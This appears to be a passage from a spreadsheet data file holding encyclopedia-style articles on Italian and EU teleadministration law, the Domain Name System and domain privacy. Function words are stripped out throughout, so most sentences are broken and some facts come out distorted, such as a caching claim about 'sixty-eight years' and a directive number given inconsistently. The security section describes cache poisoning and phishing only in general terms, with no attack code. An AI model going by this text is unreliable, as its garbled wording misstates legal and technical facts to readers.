self-configure network. such functions also exis</t>
  </si>
  <si>
    <t>Teleadministration</t>
  </si>
  <si>
    <t>teleadministration based concept documents electronic format legal value. administrative informatics new, many years merely information technology applied legal documents, reproduction paper-based legal documents electronic file systems. instead, teleadministration turns approach head. based research conducted 1978, year when, conference promoted court cassation, giovanni duni launched then-futuristic idea electronic document could legal value. 1978 also year first research digital signatures (rsa) published united states, would take twenty-five years jurists mathematicians start working together.for many years, even 1978, helped public administration kept “safe distance”, assuming ‘sacred nature’ demanded paper. information technology merely managed filed copies legal documents: known “parallel it”, since accessory activity formal value, based paper. thus, logical, legal material premise teleadministration conferment legal value documents. origins terminology italy, linguistic expression teleamministrazione first used 1991 roman sapienza’ university, conference organised court cassation, said that: «the system administrative information technology called “teleadministration” work public administration carried devices, could also computers, linked central server network.» teleadministration indeed considered type teleworking.with teleadministration, administrative procedures become electronic administrative procedures and, specifically, initiated party realize electronic stop shop. fundamentals teleadministration decades 1970 1990, court cassation core research relationship law, organising international conferences every five years topic. 1993 international conference featured fundamentals teleadministration, providing details administrative systems behind stop shop concept: citizen presents his/her claim administration, manages entire procedure. single “administrative file” created, matter many different administrations involved. internal external stages administrative procedure, "warning signal" sent telematically relevant office next stage due, employee office becomes responsible phase procedure. information concerning records already held public administration accessed telematically, without involving citizen. (electronic) signature identifies identity operator sophisticated techniques. original administrative electronic therefore always available telematically administration need presence increasing amount on-line data necessitate greater automatic data processing decision-making. saving data multiple memory locations guarantee safekeeping acts. statistical data available real time multiple profiles, great benefits level decision-making. private citizens obtain paper copies electronic acts.the fundamental mentions electronic rather digital signatures. this because, jurists’ domain, digital signatures known. generic reference electronic signature however valid, general nature actually suitable rules contained years later directive 1999/93/ec. see, directive refers particular procedures initiated private citizens, system remains valid procedures initiated administration offices well. acknowledgement principles current legally accepted form acts documents evolved according following stages: acts exist paper form acts electronic format possible option electronic format compulsory, safe exceptionsin italy, phase launched para, march 1997, (the so-called ‘bassanini law: established legal value electronic documents, regulations would establish authentication criteria). intervened later directive 1999/93/ec european parliament council december 1999 (transposed decree n.10 january 2002), imposes obligation member states give legal value documents digital signatures (not directly named such, features described directive). also establishes electronic documents rejected priori, hence opening range different solutions establish authorship document (the so-called ‘weak signatures’). 1993 directive revoked absorbed (for reasons legal certainty clarity) regulation 910/2014 european parliament council july 2014 (also known eidas regulation) ojeu august 2014, renege principle also accepting so-called ‘weak signatures’. italy, move phase established art.40 legislative decree n.82 march 2007, code digital administration (cad), entitled “creation electronic documents”, states: “public administrations make original copy documents electronic means, according provisions present code technical specifications article 71”. exceptions extremely rare: comma states: means appropriate regulations.... proposed delegated ministers public functions, innovation technology minister cultural heritage activities, categories administrative documents created paper original identified, regard special historical archive value nature” (think, example, resignation president republic). unfortunately, national administrations ignoring provision, today private companies longer allowed paper-based communication public administrations (art. d.p.c.m. july 2011); compulsory electronic invoicing added march 2015 december 2007, art. para 209-214 implemented ministerial decree n.55 april 2013, clarified ministerial circular march 2015. modernisation procedures also touched presidential decree october 1998 (creation stop shop, production activities, paper based), interest telematic procedure began legislative decree march 2005, cad, relevant first version later modified several interventions, particularly legislative decree december 2013. european sources also essential. later european union, undertaken wide range actions e-government: important launch idabc programme (and financing) interoperable delivery european egovernment services public administrations, business citizens, decision 2004/387/ec european parliament council april 2004. however, ultimate acknowledgement principles teleadministration, telematic stop shop, contained directive 2006/123/ec european parliament council december 2006, internal market services, provides member states electronic stop shop wide field administrative procedures. teleadministration ‘star’ procedure this article meant argue great effect teleadministration efficiency administrative activity, assume reader fully aware that, paper based documents abandoned, real-time flow documents greatly improves time management responsibility single offices/ operators, direct online access improves transparency. rather, paragraph wants emphasize teleadministration promotes maximum usage “star procedure”, known researched germany “sternverfahren”. this procedure, alternative sequential procedure, nature longer head times, paper-based world would require making several copies administrative file (which extremely voluminous) office administration needs express opinion issue authorisation. with stop shop, administration initiating process charged task. electronic files clearly provide evident benefits procedures, since involved administrations directly simultaneously access file, view part need evaluate opinion authorisation directly, using star-shaped scheme. assessing actual acceptance teleadministration current real life scientific proposition, teleadministration sketched system telematic administrative procedures well ahead law, particularly electronic stop shop concept. both concepts based dematerialisation documents telematic administrative work. concept documents’ dematerialisation, existence since 1978 scientific notion, first embraced italy (law march 1997, art. para later e.c. directive 1999/93/ec. once principle electronic document legal value accepted, possible deal management within telematic procedure. mentioned, configuring procedure within rules teleadministration today accepted european italian laws. european laws also provide quite detailed description electronic stop shop, rules nicely within scientific rules teleadministration; main limitation specifically designed free circulation services within europe, hence procedures require. above-mentioned 1996/123/ec directive, whose art.6 establishes stop shop art. provides managed “remotely electronically”, leaving details commission. indeed commission, decision october 2009, provided number measures facilitate electronic procedures “one stop shop” directive 2006/123/ec. these sources clear apply wide-ranging sector: problem sector procedure related supply services within union regulated, member states therefore able carry old-fashioned paper-based procedures. light limitation, group illustrious european academics, coordinated giovanni duni, drafted effective text directive providing universal system telematic administrative procedure.italian sources based code digital administration, above-mentioned decree n.82 march 2005 current version, following several modifications, correctly interpreted implemented) make compulsory public administrations teleadministration, thus making telematic administrative procedure default procedural method. art. provision, establishes proceeding administration creates electronic file, involved administrations access, feed acts competence. private citizens also access 241/90 thus electronic file technical organizational specification telematic administrative procedure, clear creation operative stage procedure simply filing system archives. art. appears first odds interpretation, since establishes stop shop productive activities provides services electronically leaves doubts possibility back office activities could still paper-based. however, art. art. interpreted together, possible conclusion former clarification front office activities, administrative activity based general rule electronic files, therefore teleadministration stop shop. compared european italian law, reality somewhat behind. eight years directive 1996/123/ce, would grounds infraction procedure italy. since italy enjoys company several non-compliant member states, ‘safe’ time being. though letter respected, seems unlikely determine invalidity nullity acts violation art. 41(electronic file) art. (statutory requirement digital signature), front claim nature, administrative judge would apply artt. septies octies 241/90. claimant demonstrate electronic format electronic file would different outcome. legal sources 1995 utah code, paras 46-3-101 46-3-504 (enacted 1995, 61). senate, 1594, digital signature electronic authentication (seal) 1998. house representatives, h.r. 3472, digital signature electronic authentication (seal) 1998 european parliament council directive 1999/93/ec december 1999, revoked absorbed european parliament council regulation 910/2014 july 2014, (known eidas regulation) ojeu august 2014. european parliament council decision 2004/387/ec april 2004 interoperable delivery european egovernment services european parliament council directive 2006/123/ec december 2006, internal market services, providing member states establish electronic stop shop vast field administrative procedures. decision october 2009, establishing measures facilitate electronic procedures «one stop shop» directive 2006/123/cethe telematic procedures european union. introducing draft directive, research coordinated duni, ittig informatica diritto, vol. xxi, 2012, 113–129 www.teleamministrazione.it. regulation european parliament council july 2014, 910/2014 (abbreviated eidas regulation) august 2014. italian march 1997, art. para, january 2002, d.p.r. october 1998, legisl. march 2005, codice dell'amministrazione digitale (cad) d.p.c.m. july 2011 legisl december 2013, legisl. december 2016, 179, (last modification italian code digital administration) bibliography contaldo, teleamministrazione reti transnazionali europee come strumento l'integrazione delle pubbliche amministrazioni paesi dell'unione europea, riv. trim. diritto amministrativo, 2004, later diffie hellman, directions cryptography, ieee transactions information theory, november 1976, duni, l'utilizzabilità delle tecniche elettroniche nell'emanazione degli atti procedimenti amministrativi. spunto teoria dell'atto amministrativo emanato nella forma elettronica, "rivista amm. della repubblica italiana", 1978, pag.407 progetto nazionale teleamministrazione pubblica, “l’informatica giuridica della corte cassazione”, proceedings conference held univ. rome sapienza”, 27-29 nov. 1991, milan 1992, teleamministrazione: “scommessa” futuro paese, presentation international congress court cassation legal activity” rome, 1993, i.p.z.s. libreria dello stato, 1994, amministrazione digitale, item enciclopedia diritto, annali, milan 2007, 13-49 l’amministrazione digitale. diritto amministrativo nell’evoluzione telematica, giuffrè 2008. flora, evoluzione della informatica sistema governo degli stati uniti d’america. dissertation, cagliari, dept. political science, november 1996. gagliotti, teleamministrazione concorsi pubblici, giustizia amministrativa 3/2003, http://www.giustamm.it/ago1/articoli/gaglioti_teleamministrazione.htm#_ednref5 gardner, nuovo tipo cifrario richiederebbe milioni anni essere decifrato, scienze, december 1977, masucci, informatica pubblica, dizionario diritto pubblico directed cassese, milan, 2006, 3115 ss.; notarmuzi, codice dell’amministrazione digitale, astrid rassegna, www.astrid-online.it, 2006, id., procedimento amministrativo informatico, ivi, osnaghi, firme elettroniche documento informatico: codice richiede ulteriori integrazioni, ivi, rabbito. l'informatica servizio della pubblica amministrazione. principi della teleamministrazione piani e-government, gedit, 2007. rivest, shamir adleman, method obtaining digital signature public cryptosystems, communications acm, vol. february 1978, 120-126 telematic procedures european union. introducing draft directive, ricerca coordinata duni, ittig informatica diritto, vol. xxi, 2012, 113–129 www.teleamministrazione.it. applicazioni della multimedialità nella p.a.: teleamministrazione telelavoro”, funzione pubblica, special issue convegni forum p.a. ’96”, volume 105. also digital governance electronic document electronic paper paperless office bureaucrat e-government 2002 e-government public administration references</t>
  </si>
  <si>
    <t>Domain name system</t>
  </si>
  <si>
    <t>domain name system (dns) hierarchical decentralized naming system used identify computers reachable internet internet protocol (ip) networks. resource records contained associate domain names forms information. these commonly used human-friendly domain names numerical addresses computers need locate services devices using underlying network protocols, extended time perform many functions well. domain name system essential component functionality internet since 1985. function often-used analogy explain domain name system serves phone book internet translating human-friendly computer hostnames addresses. example, domain name www.example.com translates addresses 93.184.216.34 (ipv4) 2606:2800:220:1:248:1893:25c8:1946 (ipv6). quickly transparently updated, allowing service's location network change without affecting users, continue hostname. users take advantage meaningful uniform resource locators (urls) e-mail addresses without know computer actually locates services. important ubiquitous function central role distributed internet services cloud services content delivery networks. when user accesses distributed internet service using url, domain name translated address server proximal user. functionality exploited different users simultaneously receive different translations domain name, point divergence traditional phone-book view dns. this process using assign proximal servers users providing faster reliable responses internet widely used major internet services.the reflects structure administrative responsibility internet. each subdomain zone administrative autonomy delegated manager. zones operated registry, administrative information often complemented registry's rdap whois services. that data used gain insight track responsibility for, given host internet. history using simpler, memorable name place host's numerical address dates back arpanet era. stanford research institute (now international) maintained text file named hosts.txt mapped host names numerical addresses computers arpanet. elizabeth feinler developed maintained first arpanet directory. maintenance numerical addresses, called assigned numbers list, handled postel university southern california's information sciences institute (isi), whose team worked closely sri.addresses assigned manually. computers, including hostnames addresses, added primary file contacting network information center (nic), directed feinler, telephone business hours. later, feinler whois directory server retrieval information resources, contacts, entities. team developed concept domains. feinler suggested domains based location physical address computer. computers educational institutions would domain edu, example. team managed host naming registry 1972 1989.by early 1980s, maintaining single, centralized host table become slow unwieldy emerging network required automated naming system address technical personnel issues. postel directed task forging compromise five competing proposals solutions paul mockapetris. mockapetris instead created domain name system 1983 university southern california.the internet engineering task force published original specifications november 1983. these updated january 1986. 1984, four berkeley students, douglas terry, mark painter, david riggle, songnian zhou, wrote first unix name server implementation berkeley internet name domain, commonly referred bind. 1985, kevin dunlap substantially revised implementation. mike karels, phil almquist, paul vixie took bind maintenance. internet systems consortium founded 1994 rick adams, paul vixie, carl malamud, expressly provide home bind development maintenance. bind versions 4.9.3 onward developed maintained isc, support provided isc’s sponsors. co-architects/programmers, halley paul vixie released first production-ready version bind version 1997. since 2000, different core developers worked bind. november 1987, 1034 1035 superseded 1983 specifications. several additional request comments proposed extensions core protocols. structure domain name space domain name space consists tree data structure. each node leaf tree label zero resource records (rr), hold information associated domain name. domain name consists label, concatenated name parent node right, separated dot.the tree sub-divides zones beginning root zone. zone consist many domains domains zone manager chooses. also partitioned according class separate classes thought array parallel namespace trees. administrative responsibility zone divided creating additional zones. authority zone said delegated designated name server. parent zone ceases authoritative zone. domain name syntax, internationalization definitive descriptions rules forming domain names appear 1035, 1123, 2181, 5892. domain name consists parts, technically called labels, conventionally concatenated, delimited dots, example.com. right-most label conveys top-level domain; example, domain name www.example.com belongs top-level domain com. hierarchy domains descends right left; label left specifies subdivision, subdomain domain right. example, label example specifies subdomain domain, subdomain example.com. this tree subdivisions levels.a label contain zero characters. null label, length zero, reserved root zone. full domain name exceed length characters textual representation. internal binary representation maximum length requires octets storage, also stores length name.although technical limitation exists prevent domain name labels using character representable octet, hostnames preferred format character set. characters allowed labels subset ascii character set, consisting characters digits hyphen. this rule known rule (letters, digits, hyphen). domain names interpreted case-independent manner. labels start hyphen. additional rule requires top-level domain names all-numeric.the limited ascii characters permitted prevented representation names words many languages native alphabets scripts. make possible, icann approved internationalizing domain names applications (idna) system, user applications, browsers, unicode strings valid character using punycode. 2009 icann approved installation internationalized domain name country code top-level domains (cctlds). addition, many registries existing top-level domain names (tlds) adopted idna system, guided 5890, 5891, 5892, 5893. name servers domain name system maintained distributed database system, uses client–server model. nodes database name servers. each domain least authoritative server publishes information domain name servers domains subordinate hierarchy served root name servers, servers query looking (resolving) tld. authoritative name server authoritative name server name server gives answers queries data configured original source, example, domain administrator dynamic methods, contrast answers obtained query another name server maintains cache data. authoritative name server either primary server secondary server. historically terms master/slave primary/secondary sometimes used interchangeably current practice latter form. primary server server stores original copies zone records. secondary server uses special automatic updating mechanism protocol communication primary maintain identical copy primary records. every zone must assigned authoritative name servers. this servers stored parent domain zone name server (ns) records. authoritative server indicates status supplying definitive answers, deemed authoritative, setting protocol flag, called "authoritative answer" (aa) responses. this flag usually reproduced prominently output administration query tools, dig, indicate responding name server authority domain name question.when name server designated authoritative server domain name authoritative data, presents type error called "lame delegation" "lame response". operation address resolution mechanism domain name resolvers determine domain name servers responsible domain name question sequence queries starting right-most (top-level) domain label. proper operation domain name resolver, network host configured initial cache (hints) known addresses root name servers. hints updated periodically administrator retrieving dataset reliable source. assuming resolver cached records accelerate process, resolution process starts query root servers. typical operation, root servers answer directly, respond referral authoritative servers, e.g., query "www.wikipedia.org" referred servers. resolver queries servers referred iteratively repeats process receives authoritative answer. diagram illustrates process host named fully qualified domain name "www.wikipedia.org". this mechanism would place large traffic burden root servers, every resolution internet required starting root. practice caching used servers off-load root servers, result, root name servers actually involved relatively small fraction requests. recursive caching name server theory, authoritative name servers sufficient operation internet. however, authoritative name servers operating, every query must start recursive queries root zone domain name system user system would implement resolver software capable recursive operation.to improve efficiency, reduce traffic across internet, increase performance end-user applications, domain name system supports cache servers store query results period time determined configuration (time-to-live) domain name record question. typically, caching servers also implement recursive algorithm necessary resolve given name starting root authoritative name servers queried domain. with function implemented name server, user applications gain efficiency design operation. combination caching recursive functions name server mandatory; functions implemented independently servers special purposes. internet service providers typically provide recursive caching name servers customers. addition, many home networking routers implement caches recursion improve efficiency local network. resolvers client side called resolver. resolver responsible initiating sequencing queries ultimately lead full resolution (translation) resource sought, e.g., translation domain name address. resolvers classified variety query methods, recursive, non-recursive, iterative. resolution process combination methods.in non-recursive query, resolver queries server provides record either server authoritative, provides partial result without querying servers. case caching resolver, non-recursive query local cache delivers result reduces load upstream servers caching resource records period time initial response upstream servers. recursive query, resolver queries single server, turn query servers behalf requester. example, simple stub resolver running home router typically makes recursive query server user's isp. recursive query server answers query completely querying name servers needed. typical operation, client issues recursive query caching recursive server, subsequently issues non-recursive queries determine answer send single answer back client. resolver, another server acting recursively behalf resolver, negotiates recursive service using bits query headers. servers required support recursive queries. iterative query procedure process resolver queries chain servers. each server refers client next server chain, current server fully resolve request. example, possible resolution www.example.com would query global root server, "com" server, finally "example.com" server. circular dependencies glue records name servers delegations identified name, rather address. this means resolving name server must issue another request find address server referred. name given delegation subdomain domain delegation provided, circular dependency. case, name server providing delegation must also provide addresses authoritative name server mentioned delegation. this information called glue. delegating name server provides glue form records additional section response, provides delegation authority section response. glue record combination name server address. example, authoritative name server example.org ns1.example.org, computer trying resolve www.example.org first resolves ns1.example.org. contained example.org, requires resolving example.org first, presents circular dependency. break dependency, name server level domain includes glue along delegation example.org. glue records address records provide addresses ns1.example.org. resolver uses addresses query domain's authoritative servers, allows complete query. record caching standard practice implementing name resolution applications reduce load domain name system servers caching results locally, intermediate resolver hosts. results obtained request always associated time live (ttl), expiration time results must discarded refreshed. administrator authoritative server. period validity vary seconds days even weeks.as result distributed caching architecture, changes records propagate throughout network immediately, require caches expire refreshed ttl. 1912 conveys basic rules determining appropriate values. some resolvers override values, protocol supports caching sixty-eight years caching all. negative caching, i.e. caching fact non-existence record, determined name servers authoritative zone must include start authority (soa) record reporting data requested type exists. value minimum field record used establish negative answer. reverse lookup reverse lookup query domain names address known. multiple domain names associated address. stores addresses form domain names specially formatted names pointer (ptr) records within infrastructure top-level domain arpa. ipv4, domain in-addr.arpa. ipv6, reverse lookup domain ip6.arpa. address represented name reverse-ordered octet representation ipv4, reverse-ordered nibble representation ipv6. when performing reverse lookup, client converts address formats querying name record following delegation chain query. example, assuming ipv4 address 208.80.152.2 assigned wikimedia, represented name reverse order: 2.152.80.208.in-addr.arpa. when resolver gets pointer (ptr) request, begins querying root servers, point servers american registry internet numbers (arin) 208.in-addr.arpa zone. arin's servers delegate 152.80.208.in-addr.arpa wikimedia resolver sends another query 2.152.80.208.in-addr.arpa, results authoritative response. client lookup users generally communicate directly resolver. instead resolution takes place transparently applications browsers, e-mail clients, internet applications. when application makes request requires domain name lookup, programs send resolution request resolver local operating system, turn handles communications required. resolver almost invariably cache (see above) containing recent lookups. cache provide answer request, resolver return value cache program made request. cache contain answer, resolver send request designated servers. case home users, internet service provider machine connects usually supply server: user either configured server's address manually allowed dhcp however, systems administrators configured systems servers, resolvers point separately maintained name servers organization. event, name server thus queried follow process outlined above, either successfully finds result not. returns results resolver; assuming found result, resolver duly caches result future use, hands result back software initiated request. broken resolvers some large isps configured servers violate rules, disobeying ttls, indicating domain name exist name servers respond.some applications browsers maintain internal cache avoid repeated lookups network. this practice extra difficulty debugging issues obscures history data. these caches typically short caching times order minute.internet explorer represents notable exception: versions cache records hours default. internet explorer later versions decrease default timeout value half hour, changed modifying default configuration.when google chrome detects issues server displays specific error message. other applications domain name system includes several functions features. hostnames addresses required match one-to-one relationship. multiple hostnames correspond single address, useful virtual hosting, many sites served single host. alternatively, single hostname resolve many addresses facilitate fault tolerance load distribution multiple server instances across enterprise global internet. serves purposes addition translating names addresses. instance, mail transfer agents find best mail server deliver e-mail: record provides mapping domain mail exchanger; provide additional layer fault tolerance load distribution. used efficient storage distribution addresses blacklisted email hosts. common method place address subject host sub-domain higher level domain name, resolve name record indicates positive negative indication. example: address 102.3.4.5 blacklisted. points 5.4.3.102.blacklist.example, resolves 127.0.0.1. address 102.3.4.6 blacklisted points 6.4.3.102.blacklist.example. this hostname either configured, resolves 127.0.0.2.e-mail servers query blacklist.example find specific host connecting blacklist. many blacklists, either subscription-based free cost, available email administrators anti-spam software. provide resilience event computer network failure, multiple servers usually provided coverage domain. level global dns, thirteen groups root name servers exist, additional "copies" distributed worldwide anycast addressing. dynamic (ddns) updates server client address on-the-fly, example, moving isps mobile spots, address changes administratively. message format protocol uses types messages, queries replies; format. each message consists header four sections: question, answer, authority, additional space. header field (flags) controls content four sections.the header section consists following fields: identification, flags, number questions, number answers, number authority resource records (rrs), number additional rrs. each field bits long, appears order given. identification field used match responses queries. flag field consists sub-fields follows: after flag, header ends four 16-bit integers contain number records sections follow, order. question section question section simpler format resource record format used sections. each question record (there usually section) contains following fields: domain name broken discrete labels concatenated; label prefixed length label. transport protocols dns-over-udp/53 ("do53") from time origin 1983 quite recently, primarily answered queries user datagram protocol (udp) port number such queries consist clear-text request sent single packet client, responded clear-text reply sent single packet server. when length answer exceeds bytes client server support extension mechanisms (edns), larger packets used. dns-over-udp limited among things, lack transport-layer encryption, authentication, reliable delivery, message length. dns-over-tcp/53 ("do53/tcp") 1989, 1123 specified optional transmission control protocol (tcp) transport queries, replies and, particularly, zone transfers. fragmentation long replies, allows longer responses, reliable delivery, re-use long-lived connections clients servers. dns-over-tls ("dot") ietf standard encrypted emerged 2016, utilizing standard transport layer security (tls) protect entire connection, rather payload. servers listen port 853. 7858 specifies opportunistic encryption authenticated encryption supported, make either server client authentication mandatory. dns-over-https ("doh") competing standard query transport introduced 2018, tunneling query data https (which turn transports http tls). promoted web-friendly alternative since, like dnscrypt, travels port 443, thus looks similar traffic, though easily differentiable practice. widely criticized decreasing user anonymity relative dot. oblivious ("odns") oblivious ("odoh") oblivious (odns) invented implemented researchers princeton university university chicago extension unencrypted dns, standardized widely deployed. apple cloudflare subsequently deployed technology context doh, oblivious (odoh). odoh combines ingress/egress separation (invented odns) doh's https tunneling transport-layer encryption single protocol. dns-over-tor like internet protocols, vpns tunnels. become common enough since 2019 warrant frequently used acronym dns-over-tor. privacy gains oblivious garnered preexisting network ingress egress nodes, paired transport-layer encryption provided tls. dns-over-quic ("doq") 9250 internet engineering task force describes quic. dnscrypt dnscrypt protocol, developed 2011 outside ietf standards framework, introduced encryption downstream side recursive resolvers, wherein clients encrypt query payloads using servers' public keys, published (rather relying upon third-party certificate authorities) turn protected dnssec signatures. dnscrypt uses either port 443, port https encrypted traffic. this introduced privacy regarding content query, also significant measure firewall-traversal capability. 2019, dnscrypt extended support "anonymized" mode, similar proposed "oblivious dns," ingress node receives query encrypted public different server, relays server, acts egress node, performing recursive resolution. privacy user/query pairs created, since ingress node know content query, egress nodes know identity client. dnscrypt first implemented production opendns december 2011. there several free open source software implementations additionally integrate odoh. available variety operating systems, including unix, apple ios, linux, android, windows. resource records domain name system specifies database information elements network resources. types information elements categorized organized list record types, resource records (rrs). each record type (name number), expiration time (time live), class, type-specific data. resource records type described resource record (rrset), special ordering. resolvers return entire upon query, servers implement round-robin ordering achieve load balancing. contrast, domain name system security extensions (dnssec) work complete resource record canonical order. when sent internet protocol network, records common format specified 1035: name fully qualified domain name node tree. wire, name shortened using label compression ends domain names mentioned earlier packet substituted current domain name. type record type. indicates format data gives hint intended use. example, record used translate domain name ipv4 address, record lists name servers answer lookups zone, record specifies mail server used handle mail domain specified e-mail address. rdata data type-specific relevance, address address records, priority hostname records. well known record types label compression rdata field, "unknown" record types must (rfc 3597). class record (for internet) common records involving internet hostnames, servers, addresses. addition, classes chaos (ch) hesiod (hs) exist. each class independent name space potentially different delegations zones. addition resource records defined zone file, domain name system also defines several request types used communication nodes wire), performing zone transfers (axfr/ixfr) edns (opt). wildcard records domain name system supports wildcard records specify names start asterisk label, '*', e.g., *.example. records belonging wildcard domain names specify rules generating resource records within single zone substituting whole labels matching components query name, including specified descendants. example, following configuration, zone x.example specifies subdomains, including subdomains subdomains, x.example mail exchanger (mx) a.x.example. record a.x.example needed specify mail exchanger address. result excluding domain name subdomains wildcard matches, additional record subdomain a.x.example, well wildcarded record subdomains, must also defined zone. role wildcard records refined 4592, original definition 1034 incomplete resulted misinterpretations implementers. protocol extensions original protocol limited provisions extension features. 1999, paul vixie published 2671 (superseded 6891) extension mechanism, called extension mechanisms (edns) introduced optional protocol elements without increasing overhead use. this accomplished pseudo-resource record exists wire transmissions protocol, zone files. initial extensions also suggested (edns0), increasing message size datagrams. dynamic zone updates dynamic updates update opcode remove resource records dynamically zone database maintained authoritative server. feature described 2136. this facility useful register network clients boot become otherwise available network. booting client assigned different address time dhcp server, possible provide static assignments clients. security issues originally, security concerns major design considerations software software deployment early internet, network open participation general public. however, expansion internet commercial sector 1990s changed requirements security measures protect data integrity user authentication. several vulnerability issues discovered exploited malicious users. issue cache poisoning, data distributed caching resolvers pretense authoritative origin server, thereby polluting data store potentially false information long expiration times (time-to-live). subsequently, legitimate application requests redirected network hosts operated malicious intent. responses traditionally cryptographic signature, leading many attack possibilities; domain name system security extensions (dnssec) modify support cryptographically signed responses. dnscurve proposed alternative dnssec. other extensions, tsig, support cryptographic authentication trusted peers commonly used authorize zone transfer dynamic update operations. some domain names used achieve spoofing effects. example, paypal.com paypa1.com different names, users unable distinguish graphical user interface depending user's chosen typeface. many fonts letter numeral look similar even identical. this problem acute systems support internationalized domain names, many character codes 10646 appear identical typical computer screens. this vulnerability occasionally exploited phishing.techniques forward-confirmed reverse also used help validate results. also "leak" otherwise secure private connections, attention paid configuration, times used bypass firewalls malicious persons, exfiltrate data, since often seen innocuous. privacy tracking issues originally designed public, hierarchical, distributed heavily cached database, protocol confidentiality controls. user queries nameserver responses sent unencrypted enables network packet sniffing, hijacking, cache poisoning man-in-the-middle attacks. this deficiency commonly used cybercriminals network operators marketing purposes, user authentication captive portals censorship.user privacy exposed proposals increasing level client information queries (rfc 7871) benefit content delivery networks. main approaches counter privacy issues dns: vpns, move resolution operator hide user traffic local isp, tor, replaces traditional resolution anonymous .onion domains, hiding name resolution user traffic behind onion routing counter-surveillance, proxies public servers, move actual resolution third-party provider, usually promises little request logging optional added features, dns-level advertisement pornography blocking. public servers queried using traditional protocol, case provide protection local surveillance, dns-over-https, dns-over-tls dnscrypt, provide protectionsolutions preventing inspection local network operator criticized thwarting corporate network security policies internet censorship. they also criticized privacy point view, giving away resolution hands small number companies known monetizing user traffic centralizing name resolution, generally perceived harmful internet. google dominant provider platform android, browser chrome, resolver 8.8.8.8 service. would scenario case single corporate entity position overarching control entire namespace internet? netflix already fielded used resolution mechanism independent platform upon running. what facebook included doh? what apple's used doh-resolution mechanism bypass local resolution steer queries apple's platforms apple-operated name resolvers? domain name registration right domain name delegated domain name registrars accredited internet corporation assigned names numbers (icann) organizations opennic, charged overseeing name number systems internet. addition icann, top-level domain (tld) maintained serviced technically administrative organization, operating registry. registry responsible operating database names within authoritative zone, although term often used tlds. registrant person organization asked domain registration. registry receives registration information domain name registrar, authorized (accredited) assign names corresponding zone publishes information using whois protocol. 2015, usage rdap considered.icann publishes complete list tlds, registries, domain name registrars. registrant information associated domain names maintained online database accessible whois service. country code top-level domains (cctlds), domain registries maintain whois (registrant, name servers, expiration dates, etc.) information. instance, denic, germany nic, holds domain data. from 2001, generic top-level domain (gtld) registries adopted so-called thick registry approach, i.e. keeping whois data central registries instead registrar databases. top-level domains net, thin registry model used. domain registry (e.g., godaddy, bigrock pdr, verisign, etc., etc.) holds basic whois data (i.e., registrar name servers, etc.). organizations, registrants using hand, public interest registry exclusively. some domain name registries, often called network information centers (nic), also function registrars end-users, addition providing access whois datasets. top-level domain registries, domains com, net, registry-registrar model consisting many domain name registrars. method management, registry manages domain name database relationship registrars. registrants (users domain name) customers registrar, cases additional subcontracting resellers. documents standards domain name system defined request comments (rfc) documents published internet engineering task force (internet standards). following list rfcs define protocol. 1034, domain names concepts facilities 1035, domain names implementation specification 1123, requirements internet hosts—application support 1995, incremental zone transfer 1996, mechanism prompt notification zone changes (dns notify) 2136, dynamic updates domain name system (dns update) 2181, clarifications specification 2308, negative caching queries (dns ncache) 2672, non-terminal name redirection 2845, secret transaction authentication (tsig) 3225, indicating resolver support dnssec 3226, dnssec ipv6 aware server/resolver message size requirements 3596, extensions support version 3597, handling unknown resource record (rr) types 4343, domain name system (dns) case insensitivity clarification 4592, role wildcards domain name system 4635, hmac tsig algorithm identifiers 5001, name server identifier (nsid) option 5011, automated updates security (dnssec) trust anchors 5452, measures making more resilient forged answers 5890, internationalized domain names applications (idna):definitions document framework 5891, internationalized domain names applications (idna): protocol 5892, unicode code points internationalized domain names applications (idna) 5893, right-to-left scripts internationalized domain names applications (idna) 6891, extension mechanisms (edns0) 7766, transport implementation requirements proposed security standards 4033, security introduction requirements 4034, resource records security extensions 4035, protocol modifications security extensions 4509, sha-256 dnssec delegation signer (ds) resource records 4470, minimally covering nsec records dnssec on-line signing 5155, security (dnssec) hashed authenticated denial existence 5702, sha-2 algorithms dnskey rrsig resource records dnssec 5910, domain name system (dns) security extensions mapping extensible provisioning protocol (epp) 5933, gost signature algorithms dnskey rrsig resource records dnssec 7830, edns(0) padding option 7858, specification transport layer security (tls) 8310, usage profiles dtls 8484, queries https (doh) experimental rfcs 1183, definitions best current practices 2182, selection operation secondary servers (bcp 2317, classless in-addr.arpa delegation (bcp 5625, proxy implementation guidelines (bcp 152) 6895, domain name system (dns) iana considerations (bcp 7720, root name service protocol deployment requirements (bcp informational rfcs these rfcs advisory nature, provide useful</t>
  </si>
  <si>
    <t>Domain privacy</t>
  </si>
  <si>
    <t>domain privacy (often called whois privacy) service offered number domain name registrars. user buys privacy company, turn replaces user's information whois information forwarding service (for email sometimes postal mail, done proxy server). level anonymity personal information typically collected registrars provide service. some registrars take little persuasion release so-called 'private' information world, requiring phone request cease desist letter. others, however, handle privacy precaution, using measures including hosting domain names offshore accepting cryptocurrencies payment registrar knowledge domain name owner's personal information (which would otherwise transmitted credit card transactions). debatable whether practice odds domain registration requirement internet corporation assigned names numbers (icann). privacy default some top-level domains privacy caveats: .al: information owner disclosed. .at, .co.at, .or.at: since 2010, contact data (defined phone number, number, e-mail address) hidden registrar must explicitly made public. .ca: since june 2008, canadian internet registration authority longer posts registration details individuals associated domains. since january 2021 whois information private default obtained limited cases .de: since 2018, german internet registration authority denic extensive changes force whois lookup service. with exceptions, third parties longer access domain ownership data. .eu: registrant natural person, e-mail address shown public whois records unless specified otherwise. .fi: individual persons' data published (changed 2019), companies, associations, etc., data published. .fr: default, individual domain name holders benefit restricted publishing personal data afnic public whois. .gr: information owner disclosed. .is: hide address phone number. .nl: since january 2010, registrant postal addresses longer publicly available. .ovh: contact data hidden registrar must explicitly made public. .uk: nominet, guardian domain namespace, provide domain privacy tools extensions (.co.uk, .me.uk etc.), providing registrant trading domain name. while home address registrant hidden, full name cannot. .ro: information owner disclosed. privacy forbidden .us: march 2005, national telecommunications information administration (ntia) said owners domains option keeping information private, must made public. .in: registrants indian domain names proxy privacy services provided registrars. italian domain names keep information private law. australian domain names ends forbidden privacy law. while information public, information street address, telephone numbers registrant hidden. implications internet corporation assigned names numbers (icann) broadly requires mailing address, phone number, e-mail address owning administrating domain name made publicly available "whois" directories. however, policy enables spammers, direct marketers, identity thieves, attackers directory acquire personal information people. although icann working change whois enable greater privacy, lack consensus among major stakeholders type change made. however, offer private registration many registrars, risk mitigated. litigation with help "private registration", service legal owner domain. this occasionally resulted legal problems. ownership domain name given organization name owner contact domain's whois record. there typically four contact positions domain's whois record: owner, administrator, billing, technical. some registrars shield owner organization name order protect ownership domain name.ownership domains held privacy service also issue registerfly case, registrar effectively ceased operations went bankrupt. customers encountered 